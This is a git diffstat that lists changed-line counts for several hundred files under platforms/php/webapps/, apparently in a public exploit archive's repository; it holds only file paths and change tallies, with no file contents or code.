platforms/php/webapps/6957.txt | 39 +- platforms/php/webapps/6958.txt | 60 +- platforms/php/webapps/6960.txt | 72 +- platforms/php/webapps/6962.txt | 90 +- platforms/php/webapps/6964.txt | 56 +- platforms/php/webapps/6965.txt | 56 +- platforms/php/webapps/6966.txt | 56 +- platforms/php/webapps/6967.txt | 78 +- platforms/php/webapps/6968.txt | 38 +- platforms/php/webapps/6969.txt | 152 +- platforms/php/webapps/6971.txt | 66 +- platforms/php/webapps/6972.txt | 72 +- platforms/php/webapps/6973.txt | 70 +- platforms/php/webapps/6974.txt | 100 +- platforms/php/webapps/6975.txt | 86 +- platforms/php/webapps/6976.txt | 88 +- platforms/php/webapps/6977.txt | 88 +- platforms/php/webapps/6978.txt | 52 +- platforms/php/webapps/6979.txt | 44 +- platforms/php/webapps/6980.txt | 72 +- platforms/php/webapps/6981.txt | 112 +- platforms/php/webapps/6982.txt | 110 +- platforms/php/webapps/6983.txt | 54 +- platforms/php/webapps/6984.txt | 54 +- platforms/php/webapps/6985.txt | 54 +- platforms/php/webapps/6986.txt | 56 +- platforms/php/webapps/6987.txt | 104 +- platforms/php/webapps/6989.txt | 32 +- platforms/php/webapps/6990.txt | 48 +- platforms/php/webapps/6991.txt | 188 +- platforms/php/webapps/6993.php | 3060 ++-- platforms/php/webapps/6995.txt | 78 +- platforms/php/webapps/6996.php | 384 +- platforms/php/webapps/6997.txt | 86 +- platforms/php/webapps/6998.txt | 92 +- platforms/php/webapps/6999.txt | 110 +- platforms/php/webapps/7000.txt | 92 +- platforms/php/webapps/7001.txt | 480 +- platforms/php/webapps/7002.txt | 86 +- platforms/php/webapps/7003.txt | 82 +- platforms/php/webapps/7004.txt | 70 +- platforms/php/webapps/7005.txt | 124 +- platforms/php/webapps/7007.txt | 52 +- platforms/php/webapps/7008.txt | 124 +- platforms/php/webapps/7009.txt | 117 +- platforms/php/webapps/7010.txt | 129 +- platforms/php/webapps/7011.pl | 568 +- platforms/php/webapps/7012.txt | 264 +- platforms/php/webapps/7013.txt | 135 +- platforms/php/webapps/7014.txt | 129 +- 
platforms/php/webapps/7015.txt | 137 +- platforms/php/webapps/7016.txt | 131 +- platforms/php/webapps/7017.txt | 94 +- platforms/php/webapps/7018.txt | 114 +- platforms/php/webapps/7019.txt | 58 +- platforms/php/webapps/702.pl | 6 +- platforms/php/webapps/7020.txt | 128 +- platforms/php/webapps/7021.txt | 130 +- platforms/php/webapps/7025.txt | 92 +- platforms/php/webapps/7026.txt | 70 +- platforms/php/webapps/7027.txt | 124 +- platforms/php/webapps/7028.txt | 112 +- platforms/php/webapps/7029.txt | 106 +- platforms/php/webapps/7030.txt | 117 +- platforms/php/webapps/7031.php | 462 +- platforms/php/webapps/7032.txt | 124 +- platforms/php/webapps/7033.txt | 122 +- platforms/php/webapps/7034.txt | 126 +- platforms/php/webapps/7035.txt | 74 +- platforms/php/webapps/7038.txt | 146 +- platforms/php/webapps/7039.txt | 106 +- platforms/php/webapps/7040.txt | 116 +- platforms/php/webapps/7041.txt | 58 +- platforms/php/webapps/7042.txt | 114 +- platforms/php/webapps/7043.txt | 134 +- platforms/php/webapps/7044.txt | 90 +- platforms/php/webapps/7045.txt | 86 +- platforms/php/webapps/7046.txt | 86 +- platforms/php/webapps/7047.txt | 82 +- platforms/php/webapps/7048.txt | 28 +- platforms/php/webapps/7049.txt | 66 +- platforms/php/webapps/7050.txt | 80 +- platforms/php/webapps/7052.txt | 70 +- platforms/php/webapps/7057.pl | 300 +- platforms/php/webapps/7058.txt | 126 +- platforms/php/webapps/7059.txt | 114 +- platforms/php/webapps/7062.txt | 128 +- platforms/php/webapps/7064.pl | 220 +- platforms/php/webapps/7065.txt | 73 +- platforms/php/webapps/7066.txt | 106 +- platforms/php/webapps/7068.txt | 134 +- platforms/php/webapps/7070.txt | 28 +- platforms/php/webapps/7071.txt | 134 +- platforms/php/webapps/7072.txt | 102 +- platforms/php/webapps/7074.txt | 92 +- platforms/php/webapps/7076.txt | 348 +- platforms/php/webapps/7077.txt | 28 +- platforms/php/webapps/7078.txt | 58 +- platforms/php/webapps/7079.txt | 56 +- platforms/php/webapps/7080.txt | 92 +- 
platforms/php/webapps/7081.txt | 128 +- platforms/php/webapps/7082.txt | 126 +- platforms/php/webapps/7083.txt | 128 +- platforms/php/webapps/7084.txt | 126 +- platforms/php/webapps/7085.txt | 122 +- platforms/php/webapps/7086.txt | 144 +- platforms/php/webapps/7089.txt | 108 +- platforms/php/webapps/7092.txt | 60 +- platforms/php/webapps/7093.txt | 64 +- platforms/php/webapps/7094.txt | 38 +- platforms/php/webapps/7095.txt | 66 +- platforms/php/webapps/7096.txt | 87 +- platforms/php/webapps/7097.txt | 68 +- platforms/php/webapps/7098.txt | 104 +- platforms/php/webapps/7101.txt | 116 +- platforms/php/webapps/7102.txt | 92 +- platforms/php/webapps/7103.txt | 86 +- platforms/php/webapps/7105.txt | 116 +- platforms/php/webapps/7106.txt | 110 +- platforms/php/webapps/7107.txt | 198 +- platforms/php/webapps/7110.txt | 130 +- platforms/php/webapps/7111.txt | 130 +- platforms/php/webapps/7112.txt | 166 +- platforms/php/webapps/7113.txt | 20 +- platforms/php/webapps/7114.txt | 310 +- platforms/php/webapps/7116.txt | 152 +- platforms/php/webapps/7117.txt | 200 +- platforms/php/webapps/7118.txt | 108 +- platforms/php/webapps/7119.php | 136 +- platforms/php/webapps/7121.pl | 236 +- platforms/php/webapps/7122.txt | 119 +- platforms/php/webapps/7123.txt | 86 +- platforms/php/webapps/7124.txt | 94 +- platforms/php/webapps/7128.txt | 80 +- platforms/php/webapps/7130.php | 108 +- platforms/php/webapps/7131.txt | 78 +- platforms/php/webapps/7133.txt | 64 +- platforms/php/webapps/7134.txt | 100 +- platforms/php/webapps/7136.txt | 72 +- platforms/php/webapps/7138.txt | 74 +- platforms/php/webapps/7140.txt | 54 +- platforms/php/webapps/7143.txt | 64 +- platforms/php/webapps/7144.txt | 74 +- platforms/php/webapps/7146.txt | 40 +- platforms/php/webapps/7147.txt | 108 +- platforms/php/webapps/7148.txt | 98 +- platforms/php/webapps/7149.php | 256 +- platforms/php/webapps/7152.txt | 76 +- platforms/php/webapps/7153.txt | 160 +- platforms/php/webapps/7155.txt | 48 +- 
platforms/php/webapps/7156.txt | 38 +- platforms/php/webapps/7157.txt | 98 +- platforms/php/webapps/7159.php | 566 +- platforms/php/webapps/7160.php | 296 +- platforms/php/webapps/7162.pl | 216 +- platforms/php/webapps/7163.txt | 52 +- platforms/php/webapps/7164.txt | 84 +- platforms/php/webapps/7165.pl | 148 +- platforms/php/webapps/7166.txt | 72 +- platforms/php/webapps/7168.pl | 234 +- platforms/php/webapps/7170.php | 242 +- platforms/php/webapps/7172.txt | 56 +- platforms/php/webapps/7173.php | 294 +- platforms/php/webapps/7175.txt | 26 +- platforms/php/webapps/7176.txt | 84 +- platforms/php/webapps/7179.txt | 26 +- platforms/php/webapps/7180.txt | 94 +- platforms/php/webapps/7182.txt | 36 +- platforms/php/webapps/7184.txt | 98 +- platforms/php/webapps/7185.php | 278 +- platforms/php/webapps/7186.txt | 72 +- platforms/php/webapps/7188.txt | 84 +- platforms/php/webapps/7189.txt | 84 +- platforms/php/webapps/7190.txt | 112 +- platforms/php/webapps/7195.txt | 68 +- platforms/php/webapps/7197.txt | 42 +- platforms/php/webapps/7198.txt | 68 +- platforms/php/webapps/7199.txt | 68 +- platforms/php/webapps/720.pl | 6 +- platforms/php/webapps/7200.txt | 86 +- platforms/php/webapps/7201.txt | 86 +- platforms/php/webapps/7202.txt | 60 +- platforms/php/webapps/7204.txt | 128 +- platforms/php/webapps/7205.txt | 42 +- platforms/php/webapps/7206.txt | 115 +- platforms/php/webapps/7208.txt | 88 +- platforms/php/webapps/7210.txt | 56 +- platforms/php/webapps/7214.txt | 62 +- platforms/php/webapps/7215.txt | 106 +- platforms/php/webapps/7216.txt | 224 +- platforms/php/webapps/7217.pl | 516 +- platforms/php/webapps/7218.txt | 114 +- platforms/php/webapps/7221.txt | 225 +- platforms/php/webapps/7222.txt | 92 +- platforms/php/webapps/7223.txt | 92 +- platforms/php/webapps/7224.txt | 94 +- platforms/php/webapps/7225.txt | 72 +- platforms/php/webapps/7227.txt | 96 +- platforms/php/webapps/7228.txt | 66 +- platforms/php/webapps/7229.txt | 62 +- platforms/php/webapps/7230.pl | 398 +- 
platforms/php/webapps/7231.txt | 76 +- platforms/php/webapps/7232.txt | 86 +- platforms/php/webapps/7234.txt | 122 +- platforms/php/webapps/7235.txt | 66 +- platforms/php/webapps/7237.txt | 100 +- platforms/php/webapps/7238.txt | 72 +- platforms/php/webapps/7239.txt | 66 +- platforms/php/webapps/7240.txt | 136 +- platforms/php/webapps/7241.txt | 140 +- platforms/php/webapps/7242.txt | 78 +- platforms/php/webapps/7243.php | 120 +- platforms/php/webapps/7244.txt | 46 +- platforms/php/webapps/7245.txt | 30 +- platforms/php/webapps/7246.txt | 34 +- platforms/php/webapps/7247.txt | 34 +- platforms/php/webapps/7248.txt | 52 +- platforms/php/webapps/725.pl | 6 +- platforms/php/webapps/7250.txt | 62 +- platforms/php/webapps/7251.txt | 156 +- platforms/php/webapps/7252.txt | 140 +- platforms/php/webapps/7253.txt | 76 +- platforms/php/webapps/7254.txt | 136 +- platforms/php/webapps/7255.txt | 90 +- platforms/php/webapps/7256.txt | 88 +- platforms/php/webapps/7257.txt | 94 +- platforms/php/webapps/7258.txt | 30 +- platforms/php/webapps/7260.txt | 24 +- platforms/php/webapps/7261.txt | 138 +- platforms/php/webapps/7263.txt | 43 +- platforms/php/webapps/7265.txt | 162 +- platforms/php/webapps/7266.pl | 260 +- platforms/php/webapps/7267.txt | 68 +- platforms/php/webapps/7268.txt | 86 +- platforms/php/webapps/7269.pl | 184 +- platforms/php/webapps/7270.txt | 84 +- platforms/php/webapps/7271.txt | 36 +- platforms/php/webapps/7284.txt | 128 +- platforms/php/webapps/7285.txt | 48 +- platforms/php/webapps/7286.txt | 58 +- platforms/php/webapps/7290.txt | 48 +- platforms/php/webapps/7291.pl | 312 +- platforms/php/webapps/7294.pl | 184 +- platforms/php/webapps/7299.txt | 84 +- platforms/php/webapps/7301.txt | 80 +- platforms/php/webapps/7303.txt | 122 +- platforms/php/webapps/7304.pl | 328 +- platforms/php/webapps/7305.txt | 130 +- platforms/php/webapps/7306.txt | 112 +- platforms/php/webapps/7308.txt | 362 +- platforms/php/webapps/7310.txt | 124 +- platforms/php/webapps/7311.txt | 78 
+- platforms/php/webapps/7312.txt | 230 +- platforms/php/webapps/7315.txt | 40 +- platforms/php/webapps/7317.pl | 190 +- platforms/php/webapps/7318.txt | 92 +- platforms/php/webapps/7319.txt | 42 +- platforms/php/webapps/7322.pl | 236 +- platforms/php/webapps/7323.txt | 88 +- platforms/php/webapps/7324.txt | 44 +- platforms/php/webapps/7328.pl | 192 +- platforms/php/webapps/7331.pl | 130 +- platforms/php/webapps/7332.txt | 70 +- platforms/php/webapps/7335.txt | 100 +- platforms/php/webapps/7336.txt | 191 +- platforms/php/webapps/7338.txt | 70 +- platforms/php/webapps/7339.txt | 58 +- platforms/php/webapps/7341.txt | 106 +- platforms/php/webapps/7342.txt | 58 +- platforms/php/webapps/7343.txt | 48 +- platforms/php/webapps/7344.txt | 82 +- platforms/php/webapps/7345.txt | 138 +- platforms/php/webapps/7346.txt | 76 +- platforms/php/webapps/7351.txt | 72 +- platforms/php/webapps/7352.txt | 62 +- platforms/php/webapps/7354.txt | 44 +- platforms/php/webapps/7363.txt | 168 +- platforms/php/webapps/7365.php | 212 +- platforms/php/webapps/7366.php | 210 +- platforms/php/webapps/7367.php | 208 +- platforms/php/webapps/7368.txt | 104 +- platforms/php/webapps/7369.pl | 328 +- platforms/php/webapps/7374.txt | 94 +- platforms/php/webapps/7375.txt | 86 +- platforms/php/webapps/7377.txt | 42 +- platforms/php/webapps/7379.txt | 146 +- platforms/php/webapps/7380.txt | 172 +- platforms/php/webapps/7381.txt | 424 +- platforms/php/webapps/7383.txt | 76 +- platforms/php/webapps/7386.pl | 142 +- platforms/php/webapps/7388.txt | 173 +- platforms/php/webapps/7392.txt | 80 +- platforms/php/webapps/7395.txt | 46 +- platforms/php/webapps/7396.txt | 46 +- platforms/php/webapps/7397.txt | 64 +- platforms/php/webapps/7399.txt | 60 +- platforms/php/webapps/740.pl | 6 +- platforms/php/webapps/7400.txt | 52 +- platforms/php/webapps/7406.php | 246 +- platforms/php/webapps/7407.txt | 90 +- platforms/php/webapps/7408.txt | 96 +- platforms/php/webapps/7409.txt | 192 +- platforms/php/webapps/7411.txt | 
70 +- platforms/php/webapps/7417.txt | 54 +- platforms/php/webapps/7418.txt | 78 +- platforms/php/webapps/7422.txt | 58 +- platforms/php/webapps/7426.txt | 52 +- platforms/php/webapps/7430.txt | 155 +- platforms/php/webapps/7432.txt | 66 +- platforms/php/webapps/7433.txt | 108 +- platforms/php/webapps/7434.sh | 38 +- platforms/php/webapps/7435.txt | 112 +- platforms/php/webapps/7437.txt | 308 +- platforms/php/webapps/7439.txt | 118 +- platforms/php/webapps/7441.txt | 56 +- platforms/php/webapps/7443.txt | 82 +- platforms/php/webapps/7448.txt | 120 +- platforms/php/webapps/7449.txt | 42 +- platforms/php/webapps/7451.txt | 58 +- platforms/php/webapps/7453.txt | 62 +- platforms/php/webapps/7455.txt | 34 +- platforms/php/webapps/7456.txt | 74 +- platforms/php/webapps/7457.txt | 72 +- platforms/php/webapps/7458.txt | 74 +- platforms/php/webapps/7461.txt | 84 +- platforms/php/webapps/7465.txt | 78 +- platforms/php/webapps/7473.php | 362 +- platforms/php/webapps/7474.txt | 48 +- platforms/php/webapps/7475.txt | 158 +- platforms/php/webapps/7476.txt | 156 +- platforms/php/webapps/7478.txt | 38 +- platforms/php/webapps/7479.txt | 48 +- platforms/php/webapps/7480.txt | 34 +- platforms/php/webapps/7481.txt | 98 +- platforms/php/webapps/7482.txt | 160 +- platforms/php/webapps/7487.txt | 60 +- platforms/php/webapps/7489.pl | 92 +- platforms/php/webapps/7490.php | 232 +- platforms/php/webapps/7493.txt | 62 +- platforms/php/webapps/7494.txt | 132 +- platforms/php/webapps/7497.txt | 192 +- platforms/php/webapps/7500.txt | 62 +- platforms/php/webapps/7504.txt | 106 +- platforms/php/webapps/7509.txt | 46 +- platforms/php/webapps/7513.txt | 106 +- platforms/php/webapps/7514.txt | 80 +- platforms/php/webapps/7515.txt | 104 +- platforms/php/webapps/7517.txt | 60 +- platforms/php/webapps/7518.txt | 74 +- platforms/php/webapps/7519.txt | 52 +- platforms/php/webapps/7522.pl | 218 +- platforms/php/webapps/7523.php | 316 +- platforms/php/webapps/7524.txt | 44 +- 
platforms/php/webapps/7525.txt | 52 +- platforms/php/webapps/7526.txt | 152 +- platforms/php/webapps/7527.txt | 60 +- platforms/php/webapps/7529.txt | 64 +- platforms/php/webapps/7530.pl | 172 +- platforms/php/webapps/7531.txt | 52 +- platforms/php/webapps/7532.txt | 110 +- platforms/php/webapps/7537.txt | 72 +- platforms/php/webapps/7541.pl | 228 +- platforms/php/webapps/7542.txt | 74 +- platforms/php/webapps/7543.txt | 38 +- platforms/php/webapps/7544.txt | 268 +- platforms/php/webapps/7545.txt | 472 +- platforms/php/webapps/7546.txt | 66 +- platforms/php/webapps/7548.php | 170 +- platforms/php/webapps/7549.txt | 134 +- platforms/php/webapps/7551.txt | 88 +- platforms/php/webapps/7552.txt | 52 +- platforms/php/webapps/7558.txt | 52 +- platforms/php/webapps/7559.php | 430 +- platforms/php/webapps/7560.txt | 96 +- platforms/php/webapps/7561.txt | 60 +- platforms/php/webapps/7562.txt | 54 +- platforms/php/webapps/7563.txt | 46 +- platforms/php/webapps/7565.txt | 70 +- platforms/php/webapps/7567.txt | 94 +- platforms/php/webapps/7568.txt | 72 +- platforms/php/webapps/7569.txt | 62 +- platforms/php/webapps/7570.txt | 52 +- platforms/php/webapps/7572.txt | 88 +- platforms/php/webapps/7573.txt | 80 +- platforms/php/webapps/7574.txt | 72 +- platforms/php/webapps/7575.pl | 88 +- platforms/php/webapps/7576.pl | 220 +- platforms/php/webapps/7579.txt | 50 +- platforms/php/webapps/7580.txt | 34 +- platforms/php/webapps/7586.txt | 38 +- platforms/php/webapps/7593.pl | 308 +- platforms/php/webapps/7595.txt | 38 +- platforms/php/webapps/7596.txt | 51 +- platforms/php/webapps/7597.txt | 96 +- platforms/php/webapps/7598.txt | 44 +- platforms/php/webapps/7600.pl | 430 +- platforms/php/webapps/7601.txt | 92 +- platforms/php/webapps/7602.txt | 56 +- platforms/php/webapps/7605.php | 146 +- platforms/php/webapps/7606.txt | 36 +- platforms/php/webapps/7607.pl | 184 +- platforms/php/webapps/7614.txt | 54 +- platforms/php/webapps/7615.txt | 44 +- platforms/php/webapps/7616.txt | 44 +- 
platforms/php/webapps/7620.txt | 152 +- platforms/php/webapps/7621.txt | 74 +- platforms/php/webapps/7622.txt | 112 +- platforms/php/webapps/7624.txt | 36 +- platforms/php/webapps/7625.txt | 146 +- platforms/php/webapps/7626.txt | 52 +- platforms/php/webapps/7628.txt | 222 +- platforms/php/webapps/7629.txt | 70 +- platforms/php/webapps/7631.txt | 46 +- platforms/php/webapps/7633.txt | 50 +- platforms/php/webapps/7635.txt | 43 +- platforms/php/webapps/7636.pl | 80 +- platforms/php/webapps/7638.txt | 42 +- platforms/php/webapps/7639.txt | 58 +- platforms/php/webapps/7640.txt | 105 +- platforms/php/webapps/7641.txt | 38 +- platforms/php/webapps/7642.txt | 44 +- platforms/php/webapps/7644.txt | 148 +- platforms/php/webapps/7645.txt | 148 +- platforms/php/webapps/7648.txt | 66 +- platforms/php/webapps/7650.php | 180 +- platforms/php/webapps/7653.txt | 162 +- platforms/php/webapps/7657.txt | 28 +- platforms/php/webapps/7659.txt | 56 +- platforms/php/webapps/7660.txt | 52 +- platforms/php/webapps/7663.txt | 72 +- platforms/php/webapps/7664.pl | 174 +- platforms/php/webapps/7667.txt | 48 +- platforms/php/webapps/7668.pl | 196 +- platforms/php/webapps/7669.pl | 88 +- platforms/php/webapps/7670.pl | 90 +- platforms/php/webapps/7672.txt | 166 +- platforms/php/webapps/7674.txt | 58 +- platforms/php/webapps/7678.txt | 236 +- platforms/php/webapps/7679.php | 142 +- platforms/php/webapps/7680.txt | 54 +- platforms/php/webapps/7682.txt | 60 +- platforms/php/webapps/7683.pl | 174 +- platforms/php/webapps/7686.txt | 34 +- platforms/php/webapps/7687.txt | 86 +- platforms/php/webapps/7689.txt | 56 +- platforms/php/webapps/7690.txt | 52 +- platforms/php/webapps/7691.php | 164 +- platforms/php/webapps/7697.txt | 52 +- platforms/php/webapps/7698.txt | 52 +- platforms/php/webapps/7699.txt | 82 +- platforms/php/webapps/7700.php | 294 +- platforms/php/webapps/7703.txt | 78 +- platforms/php/webapps/7704.pl | 188 +- platforms/php/webapps/7705.pl | 212 +- platforms/php/webapps/7711.txt | 48 +- 
platforms/php/webapps/7716.pl | 74 +- platforms/php/webapps/7717.pl | 74 +- platforms/php/webapps/7718.txt | 40 +- platforms/php/webapps/7719.txt | 90 +- platforms/php/webapps/7723.txt | 170 +- platforms/php/webapps/7724.php | 154 +- platforms/php/webapps/7725.txt | 62 +- platforms/php/webapps/7726.txt | 54 +- platforms/php/webapps/7728.txt | 50 +- platforms/php/webapps/7729.txt | 30 +- platforms/php/webapps/7730.txt | 68 +- platforms/php/webapps/7731.txt | 121 +- platforms/php/webapps/7732.php | 98 +- platforms/php/webapps/7733.txt | 90 +- platforms/php/webapps/7734.txt | 84 +- platforms/php/webapps/7735.pl | 396 +- platforms/php/webapps/7738.txt | 50 +- platforms/php/webapps/7740.txt | 60 +- platforms/php/webapps/7743.txt | 66 +- platforms/php/webapps/7746.txt | 82 +- platforms/php/webapps/7759.txt | 64 +- platforms/php/webapps/7764.txt | 98 +- platforms/php/webapps/7775.txt | 78 +- platforms/php/webapps/7777.txt | 98 +- platforms/php/webapps/7778.txt | 158 +- platforms/php/webapps/7780.pl | 422 +- platforms/php/webapps/7786.txt | 104 +- platforms/php/webapps/7787.txt | 92 +- platforms/php/webapps/7792.txt | 134 +- platforms/php/webapps/7793.php | 136 +- platforms/php/webapps/7795.txt | 78 +- platforms/php/webapps/7796.txt | 982 +- platforms/php/webapps/7797.php | 170 +- platforms/php/webapps/7798.txt | 38 +- platforms/php/webapps/7805.txt | 38 +- platforms/php/webapps/7806.txt | 34 +- platforms/php/webapps/7813.txt | 92 +- platforms/php/webapps/7814.txt | 100 +- platforms/php/webapps/7815.txt | 46 +- platforms/php/webapps/7817.txt | 66 +- platforms/php/webapps/7819.txt | 71 +- platforms/php/webapps/7820.pl | 352 +- platforms/php/webapps/7821.pl | 420 +- platforms/php/webapps/7824.pl | 216 +- platforms/php/webapps/7828.txt | 64 +- platforms/php/webapps/7829.txt | 148 +- platforms/php/webapps/7831.txt | 68 +- platforms/php/webapps/7832.txt | 48 +- platforms/php/webapps/7833.php | 136 +- platforms/php/webapps/7834.txt | 48 +- platforms/php/webapps/7835.htm | 92 +- 
platforms/php/webapps/7837.pl | 436 +- platforms/php/webapps/7844.py | 92 +- platforms/php/webapps/7846.php | 136 +- platforms/php/webapps/7847.txt | 26 +- platforms/php/webapps/7849.txt | 42 +- platforms/php/webapps/7859.pl | 354 +- platforms/php/webapps/7862.txt | 108 +- platforms/php/webapps/7863.txt | 28 +- platforms/php/webapps/7864.py | 90 +- platforms/php/webapps/7867.php | 140 +- platforms/php/webapps/7873.txt | 32 +- platforms/php/webapps/7876.php | 182 +- platforms/php/webapps/7877.txt | 42 +- platforms/php/webapps/7878.txt | 34 +- platforms/php/webapps/7879.pl | 126 +- platforms/php/webapps/7880.txt | 156 +- platforms/php/webapps/7881.txt | 50 +- platforms/php/webapps/7883.txt | 46 +- platforms/php/webapps/7884.txt | 78 +- platforms/php/webapps/7886.txt | 178 +- platforms/php/webapps/7892.php | 160 +- platforms/php/webapps/7893.txt | 52 +- platforms/php/webapps/7894.txt | 96 +- platforms/php/webapps/7895.txt | 20 +- platforms/php/webapps/7896.php | 232 +- platforms/php/webapps/7897.php | 94 +- platforms/php/webapps/7900.txt | 72 +- platforms/php/webapps/7901.py | 120 +- platforms/php/webapps/7905.pl | 140 +- platforms/php/webapps/7908.txt | 116 +- platforms/php/webapps/7909.txt | 184 +- platforms/php/webapps/7916.txt | 44 +- platforms/php/webapps/7917.php | 152 +- platforms/php/webapps/7925.txt | 112 +- platforms/php/webapps/7927.txt | 460 +- platforms/php/webapps/7930.txt | 52 +- platforms/php/webapps/7931.txt | 36 +- platforms/php/webapps/7932.txt | 68 +- platforms/php/webapps/7933.txt | 70 +- platforms/php/webapps/7936.txt | 64 +- platforms/php/webapps/7938.txt | 86 +- platforms/php/webapps/7939.txt | 100 +- platforms/php/webapps/7940.txt | 94 +- platforms/php/webapps/7941.txt | 94 +- platforms/php/webapps/7944.php | 176 +- platforms/php/webapps/7945.php | 98 +- platforms/php/webapps/7946.txt | 62 +- platforms/php/webapps/7947.pl | 378 +- platforms/php/webapps/7948.php | 1736 +-- platforms/php/webapps/7949.rb | 180 +- platforms/php/webapps/7951.txt | 
34 +- platforms/php/webapps/7952.txt | 34 +- platforms/php/webapps/7953.txt | 86 +- platforms/php/webapps/7954.txt | 78 +- platforms/php/webapps/7955.txt | 76 +- platforms/php/webapps/7956.txt | 56 +- platforms/php/webapps/7959.txt | 50 +- platforms/php/webapps/7960.txt | 92 +- platforms/php/webapps/7961.php | 136 +- platforms/php/webapps/7964.txt | 66 +- platforms/php/webapps/7965.txt | 56 +- platforms/php/webapps/7967.pl | 406 +- platforms/php/webapps/7968.php | 136 +- platforms/php/webapps/7969.txt | 92 +- platforms/php/webapps/7972.py | 52 +- platforms/php/webapps/7976.txt | 28 +- platforms/php/webapps/7977.txt | 62 +- platforms/php/webapps/7979.txt | 84 +- platforms/php/webapps/7980.pl | 412 +- platforms/php/webapps/7984.pl | 158 +- platforms/php/webapps/7987.txt | 134 +- platforms/php/webapps/7992.txt | 64 +- platforms/php/webapps/7993.txt | 66 +- platforms/php/webapps/7996.txt | 22 +- platforms/php/webapps/7997.htm | 62 +- platforms/php/webapps/7998.txt | 80 +- platforms/php/webapps/7999.pl | 392 +- platforms/php/webapps/800.txt | 6 +- platforms/php/webapps/8000.txt | 294 +- platforms/php/webapps/8001.txt | 162 +- platforms/php/webapps/8002.txt | 82 +- platforms/php/webapps/8003.pl | 208 +- platforms/php/webapps/8004.txt | 124 +- platforms/php/webapps/8005.txt | 40 +- platforms/php/webapps/8007.php | 150 +- platforms/php/webapps/8011.txt | 188 +- platforms/php/webapps/8012.txt | 26 +- platforms/php/webapps/8014.pl | 160 +- platforms/php/webapps/8015.pl | 122 +- platforms/php/webapps/8016.txt | 78 +- platforms/php/webapps/8017.txt | 78 +- platforms/php/webapps/8018.txt | 46 +- platforms/php/webapps/8019.txt | 194 +- platforms/php/webapps/8020.txt | 76 +- platforms/php/webapps/8025.txt | 110 +- platforms/php/webapps/8026.txt | 62 +- platforms/php/webapps/8027.txt | 69 +- platforms/php/webapps/8028.pl | 436 +- platforms/php/webapps/8029.txt | 72 +- platforms/php/webapps/8030.txt | 56 +- platforms/php/webapps/8031.pph | 218 +- platforms/php/webapps/8032.txt | 78 
+- platforms/php/webapps/8033.txt | 70 +- platforms/php/webapps/8034.txt | 84 +- platforms/php/webapps/8035.txt | 74 +- platforms/php/webapps/8036.pl | 514 +- platforms/php/webapps/8039.txt | 90 +- platforms/php/webapps/8040.txt | 102 +- platforms/php/webapps/8042.txt | 68 +- platforms/php/webapps/8045.pl | 498 +- platforms/php/webapps/8046.txt | 58 +- platforms/php/webapps/8047.txt | 54 +- platforms/php/webapps/8049.txt | 70 +- platforms/php/webapps/8050.txt | 60 +- platforms/php/webapps/8052.pl | 170 +- platforms/php/webapps/8053.pl | 428 +- platforms/php/webapps/8054.pl | 476 +- platforms/php/webapps/8057.txt | 30 +- platforms/php/webapps/8062.txt | 110 +- platforms/php/webapps/8063.txt | 136 +- platforms/php/webapps/8064.pl | 258 +- platforms/php/webapps/8066.txt | 82 +- platforms/php/webapps/8068.txt | 462 +- platforms/php/webapps/8069.txt | 108 +- platforms/php/webapps/807.txt | 6 +- platforms/php/webapps/8071.txt | 114 +- platforms/php/webapps/8072.txt | 68 +- platforms/php/webapps/8073.txt | 42 +- platforms/php/webapps/8075.pl | 164 +- platforms/php/webapps/8076.txt | 74 +- platforms/php/webapps/808.txt | 6 +- platforms/php/webapps/8083.txt | 150 +- platforms/php/webapps/8088.txt | 38 +- platforms/php/webapps/809.txt | 6 +- platforms/php/webapps/8092.txt | 48 +- platforms/php/webapps/8093.pl | 262 +- platforms/php/webapps/8094.pl | 462 +- platforms/php/webapps/8095.pl | 474 +- platforms/php/webapps/8098.txt | 186 +- platforms/php/webapps/8100.pl | 138 +- platforms/php/webapps/8101.txt | 74 +- platforms/php/webapps/8104.txt | 32 +- platforms/php/webapps/8105.txt | 438 +- platforms/php/webapps/8112.txt | 56 +- platforms/php/webapps/8114.txt | 54 +- platforms/php/webapps/8115.pl | 242 +- platforms/php/webapps/8116.txt | 48 +- platforms/php/webapps/8123.txt | 182 +- platforms/php/webapps/8124.txt | 900 +- platforms/php/webapps/8133.txt | 94 +- platforms/php/webapps/8134.php | 144 +- platforms/php/webapps/8136.txt | 328 +- platforms/php/webapps/814.txt | 6 +- 
platforms/php/webapps/8140.txt | 582 +- platforms/php/webapps/8145.txt | 70 +- platforms/php/webapps/8150.txt | 116 +- platforms/php/webapps/8151.txt | 78 +- platforms/php/webapps/8164.php | 118 +- platforms/php/webapps/8165.txt | 68 +- platforms/php/webapps/8168.txt | 83 +- platforms/php/webapps/8172.txt | 80 +- platforms/php/webapps/818.txt | 6 +- platforms/php/webapps/8181.c | 218 +- platforms/php/webapps/8182.txt | 78 +- platforms/php/webapps/8183.txt | 78 +- platforms/php/webapps/8186.txt | 48 +- platforms/php/webapps/8188.txt | 52 +- platforms/php/webapps/8194.txt | 36 +- platforms/php/webapps/8195.txt | 172 +- platforms/php/webapps/8196.txt | 254 +- platforms/php/webapps/8197.txt | 50 +- platforms/php/webapps/8198.pl | 94 +- platforms/php/webapps/820.php | 6 +- platforms/php/webapps/8204.txt | 150 +- platforms/php/webapps/8207.txt | 44 +- platforms/php/webapps/8209.txt | 54 +- platforms/php/webapps/8216.txt | 120 +- platforms/php/webapps/8220.txt | 70 +- platforms/php/webapps/8226.txt | 112 +- platforms/php/webapps/8228.txt | 108 +- platforms/php/webapps/8229.txt | 34 +- platforms/php/webapps/8230.txt | 42 +- platforms/php/webapps/8237.txt | 300 +- platforms/php/webapps/8238.txt | 94 +- platforms/php/webapps/8239.txt | 138 +- platforms/php/webapps/8240.txt | 146 +- platforms/php/webapps/8252.txt | 162 +- platforms/php/webapps/8254.pl | 228 +- platforms/php/webapps/8255.txt | 54 +- platforms/php/webapps/8258.pl | 162 +- platforms/php/webapps/8271.php | 326 +- platforms/php/webapps/8272.pl | 250 +- platforms/php/webapps/8276.pl | 476 +- platforms/php/webapps/8277.txt | 78 +- platforms/php/webapps/8278.txt | 97 +- platforms/php/webapps/8282.txt | 44 +- platforms/php/webapps/8288.txt | 100 +- platforms/php/webapps/8289.pl | 514 +- platforms/php/webapps/8290.txt | 104 +- platforms/php/webapps/8292.txt | 122 +- platforms/php/webapps/8293.txt | 62 +- platforms/php/webapps/8296.txt | 46 +- platforms/php/webapps/8297.txt | 156 +- platforms/php/webapps/8298.pl | 418 
